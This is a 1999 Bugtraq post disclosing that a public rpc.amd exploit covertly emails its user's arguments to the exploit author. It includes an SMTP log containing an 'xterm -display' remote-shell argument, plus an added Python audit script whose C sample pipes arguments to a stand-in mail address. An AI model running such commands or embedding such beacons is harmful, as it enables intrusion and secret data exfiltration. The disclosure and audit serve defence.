Bugtraq mailing list archives
Re: Amd exploit
From: omri () INAME COM (Locke Montana)
Date: Sat, 4 Sep 1999 05:21:42 -0000
Hello,

Sorry if this was already known. Recently someone named Taeho Oh published an exploit for a buffer overflow in rpc.amd (automount). While testing this exploit on my own server, I saw that I was opening a connection to ohhara.postech.ac.kr on port 25. After a little research I found out that the exploit (in its original form) was sending an email to abuser () ohhara postech ac kr and listing the arguments I just entered.

There is an easy way to stop it from sending. Just comment out the line:

    system(cmd);

Here's the log as I got it from sniffit:

    EHLO BlackMesa.com
    MAIL From:<locke () BlackMesa com> SIZE=95
    RCPT To:<abuser () ohhara postech ac kr>
    DATA
    Received: (from root@localhost) by BlackMesa.com (8.9.3/8.9.3) id FAA01208 for abuser () ohhara postech ac kr; Sat, 4 Sep 1999 05:30:56 +0200
    Date: Sat, 4 Sep 1999 05:30:56 +0200
    From: locke <locke () BlackMesa com>
    Message-Id: <199909040330.FAA01208 () BlackMesa com>
    To: abuser () ohhara postech ac kr
    10.0.0.9 /usr/X11R6/bin/xterm -display 10.0.0.8:0
    .
    QUIT
    QUIT

(IPs changed to protect the innocent)

Bye
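An added example, not part of the original post and not the exploit's code: a small Python audit to run over untrusted proof-of-concept source before compiling it, reporting shell-out calls such as the system(cmd) line mentioned above and e-mail addresses embedded in string literals. The sample source, the address collector@example.invalid and the function name audit are constructed for illustration.

```python
import re

# Constructed sample standing in for untrusted proof-of-concept source;
# it is not the code discussed in the post.
SAMPLE_SOURCE = r'''
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char **argv) {
    char cmd[512];
    /* system("not a real call, only a comment"); */
    snprintf(cmd, sizeof cmd,
             "echo '%s %s' | mail collector@example.invalid", argv[1], argv[2]);
    system(cmd);
    return 0;
}
'''

SHELL_OUT = re.compile(r'\b(system|popen|execl|execlp|execle|execv|execvp|execve)\s*\(')
ADDRESS = re.compile(r'[\w.+-]+@[\w-]+(?:\.[\w-]+)+')
# String literals, character literals and comments, matched in one pass so
# that "//" inside a string is not taken for a comment and vice versa.
TOKEN = re.compile(r'''"(?:\\.|[^"\\\n])*"|'(?:\\.|[^'\\\n])+'|/\*.*?\*/|//[^\n]*''', re.S)


def audit(source):
    """Return sorted (line, kind, detail) findings to review by hand."""
    findings = []

    def visit(match):
        text = match.group(0)
        if text.startswith('"'):
            line = source.count('\n', 0, match.start()) + 1
            findings.extend((line, 'address', a) for a in ADDRESS.findall(text))
        # Blank the token but keep newlines so line numbers stay correct.
        return re.sub(r'[^\n]', ' ', text)

    code_only = TOKEN.sub(visit, source)
    # Literals and comments are blanked, so only real call sites remain.
    for call in SHELL_OUT.finditer(code_only):
        line = code_only.count('\n', 0, call.start()) + 1
        findings.append((line, 'shell-out', call.group(1)))
    return sorted(findings)


if __name__ == '__main__':
    for line, kind, detail in audit(SAMPLE_SOURCE):
        print(f'line {line}: {kind}: {detail}')
```

A clean result does not clear the source, since a command string can be assembled at run time; running untested code on an isolated host with outbound traffic blocked and logged covers that case.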